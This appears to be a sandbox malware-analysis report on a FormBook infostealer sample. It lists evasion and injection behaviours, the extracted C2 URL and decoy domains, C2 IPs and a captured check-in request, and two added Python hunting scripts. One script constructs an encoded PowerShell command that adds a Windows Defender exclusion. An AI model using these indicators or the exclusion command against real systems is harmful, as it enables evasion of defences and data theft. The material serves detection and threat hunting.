Windows Analysis Report
RFQ 245801.exe

Overview

General Information

Sample name: RFQ 245801.exe
Analysis ID: 1528045
MD5: 4be29153bc863fa6d2914aab9759e6aa
SHA1: eb30dab7d18b7bbf2673573cc96da82f6374d85b
SHA256: ffaa78a8a97885716e7dbe2a4a7ed9e1593ea5690f02f79f5d63c9b4964559da
Tags: exe, user-Maciej8910871

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match
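
Two of the signatures above ("Adds a directory exclusion to Windows Defender" and "Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet") describe the loader running PowerShell with an -EncodedCommand payload that calls Add-MpPreference. The report does not print the command line it saw, so the following is an added hunting example, not part of the Joe Sandbox report: it decodes the UTF-16LE/base64 payload and pulls out the exclusion, rather than matching the three base64 alignments of the cmdlet name the way the Sigma rule does. The command lines it runs over are constructed for illustration, and all function names are the author's own.

```python
"""Hunt for Windows Defender exclusions added through (optionally base64-encoded)
PowerShell, the behaviour behind the report's "Adds a directory exclusion to
Windows Defender" and "Sigma detected: Powershell Base64 Encoded MpPreference
Cmdlet" signatures.

Added example: not part of the Joe Sandbox report. The report does not print the
PowerShell command line it observed, so the command lines below are constructed
for illustration; the function names are the author's own.
"""
import base64
import binascii
import re

# (Add|Set)-MpPreference and everything up to the next statement separator.
MPPREF_RE = re.compile(
    r"\b(?P<cmdlet>(?:Add|Set)-MpPreference)\b(?P<args>[^;|&\r\n]*)", re.I)
# -ExclusionPath / -ExclusionProcess / -ExclusionExtension with a single value.
EXCLUSION_RE = re.compile(
    r"-Exclusion(?P<kind>Path|Process|Extension)\s+"
    r"(?P<value>\"[^\"]*\"|'[^']*'|[^\s;|&]+)", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)"
    r"\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand payload the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script if the command line carries one, else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_defender_exclusions(cmdline: str):
    """Return (cmdlet, kind, value, was_encoded) for every Defender exclusion the
    command line adds, whether written in clear text or hidden behind -EncodedCommand."""
    hits = []
    texts = [(cmdline, False)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        texts.append((decoded, True))
    for text, encoded in texts:
        for m in MPPREF_RE.finditer(text):
            for ex in EXCLUSION_RE.finditer(m.group("args")):
                hits.append((m.group("cmdlet"), ex.group("kind").title(),
                             ex.group("value").strip("\"'"), encoded))
    return hits


# Constructed command lines (not observed in the report).
CLEAR_TEXT = 'powershell.exe Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'
ENCODED = "powershell.exe -NoProfile -w hidden -enc " + encode_command(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\loader'")
BENIGN = "powershell.exe -enc " + encode_command("Get-Date")


if __name__ == "__main__":
    for line in (CLEAR_TEXT, ENCODED, BENIGN):
        print(find_defender_exclusions(line))
```

The decoded payload is searched as well as the raw command line, so an exclusion written in clear text and one wrapped in -EncodedCommand both surface; a benign encoded script yields nothing. Process-creation telemetry (Sysmon event 1 or Security 4688 with command-line auditing) is the natural feed for this.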

Classification

AV Detection

Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
Source: RFQ 245801.exe ReversingLabs: Detection: 44%
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ 245801.exe Joe Sandbox ML: detected
Source: RFQ 245801.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RFQ 245801.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 4x nop then jmp 07339222h 0_2_07339684
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 4x nop then jmp 07339222h 0_2_0733989E

Networking

Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
Source: Malware configuration extractor URLs: www.ridges-freezers-56090.bond/c24t/
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: global traffic HTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1
Host: www.j88.travel
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 6_2_0FBA8F82 getaddrinfo,setsockopt,recv, 6_2_0FBA8F82
Source: global traffic DNS traffic detected: DNS query: www.j88.travel
Source: global traffic DNS traffic detected: DNS query: www.venir-bienne.info
Source: global traffic DNS traffic detected: DNS query: www.ridges-freezers-56090.bond
Source: global traffic DNS traffic detected: DNS query: www.oko.events
Source: global traffic DNS traffic detected: DNS query: www.earing-tests-69481.bond
Source: global traffic DNS traffic detected: DNS query: www.458881233.men
Source: global traffic DNS traffic detected: DNS query: www.delark.click
Source: global traffic DNS traffic detected: DNS query: www.ilw.legal
Source: global traffic DNS traffic detected: DNS query: www.02s-pest-control-us-ze.fun
Source: global traffic DNS traffic detected: DNS query: www.sx9u.shop
Source: global traffic DNS traffic detected: DNS query: www.khizmetlergirisyapzzz2024.net
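
The only HTTP request captured above goes to www.j88.travel, which is a decoy from the extracted configuration, not the C2 (www.ridges-freezers-56090.bond). FormBook cycles through decoys and the real C2 with the same URI path, so blocking the Host of the observed GET misses the actual C2. The following is an added example, not part of the Joe Sandbox report, that separates the two using the report's own data: the C2 entry, the DNS queries and the HTTP request are copied from this report, the decoy list is trimmed to the domains that appear in the observed traffic (the full list is in the configuration above), and the function names are the author's own. Hosts are compared with the www. prefix stripped, since the DNS queries carry it and the decoy entries do not.

```python
"""Separate the real FormBook C2 from decoy traffic using the configuration the
sandbox extracted.

Added example, not part of the Joe Sandbox report. CONFIG, DNS_QUERIES and
HTTP_REQUEST are copied from this report (the decoy list is trimmed to the
domains seen in the observed traffic); function names are the author's own.
"""
from urllib.parse import urlsplit

CONFIG = {
    "C2 list": ["www.ridges-freezers-56090.bond/c24t/"],
    "decoy": [
        "venir-bienne.info", "oko.events", "earing-tests-69481.bond",
        "458881233.men", "delark.click", "ilw.legal", "02s-pest-control-us-ze.fun",
        "sx9u.shop", "khizmetlergirisyapzzz2024.net", "j88.travel",
    ],
}

# DNS queries listed under "Networking" in the report.
DNS_QUERIES = [
    "www.j88.travel", "www.venir-bienne.info", "www.ridges-freezers-56090.bond",
    "www.oko.events", "www.earing-tests-69481.bond", "www.458881233.men",
    "www.delark.click", "www.ilw.legal", "www.02s-pest-control-us-ze.fun",
    "www.sx9u.shop", "www.khizmetlergirisyapzzz2024.net",
]

# The HTTP request from the report, reassembled with CRLF line endings.
HTTP_REQUEST = (
    "GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw"
    "&D4hl2=fT-dvVK08nUDKdF HTTP/1.1\r\n"
    "Host: www.j88.travel\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def normalize(host):
    """Lower-case, drop a trailing dot and the 'www.' prefix seen on the run-time queries."""
    h = host.strip().lower().rstrip(".")
    return h[4:] if h.startswith("www.") else h


def c2_entries(config):
    """Split 'host/path' C2 entries into (host, path); the config stores them without a scheme."""
    pairs = []
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)
        pairs.append((normalize(parts.hostname), parts.path or "/"))
    return pairs


def classify_host(host, config):
    """'c2', 'decoy' or 'unknown' for a host name seen in DNS or an HTTP Host header."""
    h = normalize(host)
    if h in {c for c, _ in c2_entries(config)}:
        return "c2"
    if h in {normalize(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def parse_http_request(raw):
    """Return (method, target, headers) for the head of an HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def triage(config, dns_queries, http_requests):
    """Bucket DNS names by role and annotate each HTTP request with its role and path match."""
    result = {"c2": [], "decoy": [], "unknown": [], "http": []}
    for name in dns_queries:
        result[classify_host(name, config)].append(name)
    c2_paths = {p for _, p in c2_entries(config)}
    for raw in http_requests:
        method, target, headers = parse_http_request(raw)
        host = headers.get("host", "")
        path = urlsplit(target).path
        result["http"].append({
            "method": method, "host": host, "path": path,
            "role": classify_host(host, config),
            "c2_path": path in c2_paths,           # same path on decoys and on the real C2
            "user_agent": headers.get("user-agent"),  # the check-in carries none
        })
    return result


if __name__ == "__main__":
    for key, value in triage(CONFIG, DNS_QUERIES, [HTTP_REQUEST]).items():
        print(key, value)
```

Of the eleven names resolved, one is the C2 and ten are decoys; the lone GET hits a decoy host on the C2 path with no User-Agent, which is exactly what the Suricata "FormBook CnC Checkin (GET)" alerts above key on. For blocking and hunting, take the host from the extracted configuration, not from the request that happened to be captured.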
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: RFQ 245801.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RFQ 245801.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: RFQ 245801.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000006.00000002.4157692270.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4155839185.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1741977210.0000000008720000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: RFQ 245801.exe, 00000000.00000002.1746477242.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.fun
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/www.sx9u.shop
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.02s-pest-control-us-ze.funReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.men
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.men/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.men/c24t/www.delark.click
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.458881233.menReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.events
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.events/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.events/c24t/www.ealerslot.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.aithful.eventsReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000003.3482833958.000000000C9B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160246853.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3112813683.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyz
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyz/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.consuyt.xyz/c24t/www.khizmetlergirisyapzzz2024.net
